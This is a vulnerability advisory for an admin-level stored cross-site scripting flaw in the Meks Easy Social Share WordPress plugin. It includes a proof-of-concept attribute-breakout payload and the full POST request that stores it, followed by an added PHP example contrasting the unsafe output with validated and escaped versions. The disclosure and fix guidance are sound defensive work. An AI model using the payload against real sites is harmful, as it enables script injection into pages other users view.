wpvulndb | Asif Nawaz Minhas | WPVDB-ID:9DEC8AC7-BEFD-4C9D-9A9E-7DA9E395DBF2
Sep 26, 2022 - 12:00 a.m.

Meks Easy Social Share < 1.2.8 - Admin+ Stored Cross-Site Scripting

2022-09-26 00:00:00
Asif Nawaz Minhas
wpscan.com
stored cross-site scripting
admin
xss
settings
privilege escalation
plugin
security vulnerability

EPSS: 0.001 (Low)
Percentile: 24.8%

The plugin does not sanitise and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example, in a multisite setup).

PoC

Intercept the request made when saving the settings and put the following payload in the meks_ess_settings[color][custom_color] parameter:

    %23ffd635%22autofocus%20onfocus%3d%22alert(%2fXSS%2f)%22%2f%2f

    POST /wp-admin/options.php HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-GB,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 634
    Connection: close
    Cookie: [admin+]
    Upgrade-Insecure-Requests: 1

    option_page=meks-ess-settings&action=update&_wpnonce=5d8e1580fd&meks_ess_settings%5Bplatforms%5D%5B%5D=facebook&meks_ess_settings%5Bplatforms%5D%5B%5D=twitter&meks_ess_settings%5Bstyle%5D=1&meks_ess_settings%5Bvariant%5D=1&meks_ess_settings%5Bcolor%5D%5Btype%5D=brand&meks_ess_settings%5Bcolor%5D%5Bcustom_color%5D=%23ffd635%22autofocus%20onfocus%3d%22alert(%2fXSS%2f)%22%2f%2f&&meks_ess_settings%5Blocation%5D=above&meks_ess_settings%5Bpost_type%5D%5B%5D=post&meks_ess_settings%5Blabel_share%5D%5Btext%5D=Share+this&meks_ess_settings%5Blabel_share%5D%5Bactive%5D=0&meks_ess_settings%5Blabel_share%5D%5Bactive%5D=1&submit=Save+Changes

The XSS will be triggered when viewing the settings again.
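The missing sanitise and escape steps described above, shown as an added example that is not the plugin's code or part of the advisory. It assumes the stored colour is echoed into an input's value attribute (which the shape of the payload suggests); the function names and the default colour are hypothetical, and the WordPress functions that do the same job are named in the comments.

```php
<?php
// Added illustration, not the plugin's code. Function names are hypothetical.

// Decoded form of the custom_color value from the PoC request on this page.
$stored = urldecode('%23ffd635%22autofocus%20onfocus%3d%22alert(%2fXSS%2f)%22%2f%2f');

// Before: the stored setting is concatenated into the attribute unchanged.
function render_unsafe(string $color): string {
    return '<input type="text" name="custom_color" value="' . $color . '">';
}

// Input side: accept only #rgb or #rrggbb, otherwise fall back to a default
// (constructed value). In WordPress, sanitize_hex_color() performs this kind
// of check and can be attached through the 'sanitize_callback' argument of
// register_setting(), so it applies regardless of unfiltered_html.
function sanitize_custom_color($value, string $default = '#000000'): string {
    if (is_string($value) && preg_match('/\A#(?:[0-9a-fA-F]{3}){1,2}\z/', $value)) {
        return $value;
    }
    return $default;
}

// Output side: escape for the attribute context even when the value has
// already been validated. In WordPress this is esc_attr().
function render_safe(string $color): string {
    $escaped = htmlspecialchars($color, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="custom_color" value="' . $escaped . '">';
}

// 1. Unescaped: the quote inside the value closes the attribute early, so the
//    remainder is parsed as additional attributes on the input element.
echo render_unsafe($stored), PHP_EOL;

// 2. Escaped only: the quotes become entities and the whole string stays
//    inside value="...".
echo render_safe($stored), PHP_EOL;

// 3. Validated then escaped: the value is rejected before it is stored and
//    the default colour is rendered instead.
echo render_safe(sanitize_custom_color($stored)), PHP_EOL;

// 4. A well-formed colour (constructed sample) passes through unchanged.
echo render_safe(sanitize_custom_color('#1da1f2')), PHP_EOL;
```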

CPE
Name | Operator | Version
meks-easy-social-share | lt | 1.2.8
